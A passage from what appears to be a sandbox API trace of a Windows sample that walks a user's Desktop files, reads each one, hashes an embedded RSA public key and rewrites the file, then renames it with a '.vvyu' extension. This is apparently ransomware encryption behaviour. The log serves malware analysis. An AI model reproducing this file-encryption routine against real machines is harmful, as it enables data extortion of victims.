hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0188.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0188.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0188.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0188.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0188.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0188.310] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x3c38, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x3c38, lpOverlapped=0x0) returned 1 [0188.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0188.310] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x3c3d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.310] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0188.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0188.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0188.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0188.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.312] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0188.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0188.312] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.312] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0188.312] CloseHandle (hObject=0x584) returned 1 [0188.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0188.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d42908 [0188.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0188.314] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\kyK8l.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\kyk8l.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\kyK8l.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\kyk8l.flv.vvyu")) returned 1 [0188.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0188.315] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0188.318] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79428b10, ftCreationTime.dwHighDateTime=0x1d89b51, ftLastAccessTime.dwLowDateTime=0xa46642e0, ftLastAccessTime.dwHighDateTime=0x1d89ea4, ftLastWriteTime.dwLowDateTime=0xa46642e0, ftLastWriteTime.dwHighDateTime=0x1d89ea4, nFileSizeHigh=0x0, nFileSizeLow=0x36b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MpfQOqQiRBVBhaaAVOGl.swf", cAlternateFileName="MPFQOQ~1.SWF")) returned 1 [0188.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0188.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x794008 [0188.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0188.319] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\MpfQOqQiRBVBhaaAVOGl.swf") returned=".swf" [0188.319] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\ZsR7Xc26_DfdmVcahH\\MpfQOqQiRBVBhaaAVOGl.swf" (normalized: "c:\\users\\keecfmwgj\\desktop\\zsr7xc26_dfdmvcahh\\mpfqoqqirbvbhaaavogl.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.320] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=14000) returned 1 [0188.320] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0188.323] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x368a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.323] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0188.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0188.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0188.325] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.325] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x36b0, lpOverlapped=0x0) returned 1 [0188.326] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0188.326] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.326] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.326] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0188.327] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0188.327] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.327] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0188.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0188.327] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0188.327] GetLastError () returned 0x0 [0188.327] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0188.327] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0188.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0188.328] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0188.328] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0188.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0188.328] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0188.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0188.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0188.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x36b0) returned 0x2d43778 [0188.328] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0188.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0188.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0188.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0188.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0188.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38eb0 [0188.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39850 [0188.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ef8 [0188.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39868 [0188.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39898 [0188.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398f8 [0188.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398b0 [0188.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0188.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0188.329] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0188.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0188.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39898 | out: hHeap=0x6a0000) returned 1 [0188.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398b0 | out: hHeap=0x6a0000) returned 1 [0188.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398f8 | out: hHeap=0x6a0000) returned 1 [0188.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0188.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0188.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398f8 [0188.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0188.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398b0 [0188.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0188.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39898 [0188.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0188.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0188.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0188.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0188.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0188.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0188.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0188.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0188.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0188.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398b0 | out: hHeap=0x6a0000) returned 1 [0188.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0188.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39898 | out: hHeap=0x6a0000) returned 1 [0188.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0188.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0188.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398f8 | out: hHeap=0x6a0000) returned 1 [0188.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0188.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0188.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0188.332] GetCurrentThreadId () returned 0x264 [0188.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0188.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d38458 [0188.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0188.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0188.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0188.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0188.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0188.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0188.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.332] GetCurrentThreadId () returned 0x264 [0188.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0188.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0188.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0188.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0188.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0188.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0188.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0188.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0188.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0188.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0188.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398f8 [0188.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0188.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0188.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0188.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0188.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0188.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0188.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0188.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0188.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39898 [0188.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0188.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0188.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0188.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0188.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0188.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0188.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0188.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398b0 [0188.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0188.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0188.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0188.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39880 [0188.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0188.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39910 [0188.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0188.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0188.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0188.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398e0 [0188.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0188.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398c8 [0188.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0188.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39928 [0188.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398c8 | out: hHeap=0x6a0000) returned 1 [0188.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d398c8 [0188.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398e0 | out: hHeap=0x6a0000) returned 1 [0188.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0188.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0188.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0188.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0188.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0188.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39898 | out: hHeap=0x6a0000) returned 1 [0188.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39898 [0188.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0188.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0188.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398f8 | out: hHeap=0x6a0000) returned 1 [0188.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0188.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39928 | out: hHeap=0x6a0000) returned 1 [0188.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0188.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0188.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0188.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0188.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0188.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39898 | out: hHeap=0x6a0000) returned 1 [0188.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0188.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0188.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0188.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0188.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0188.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0188.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0188.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0188.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0188.338] HeapFree (in: hHeap=0x6a0000, 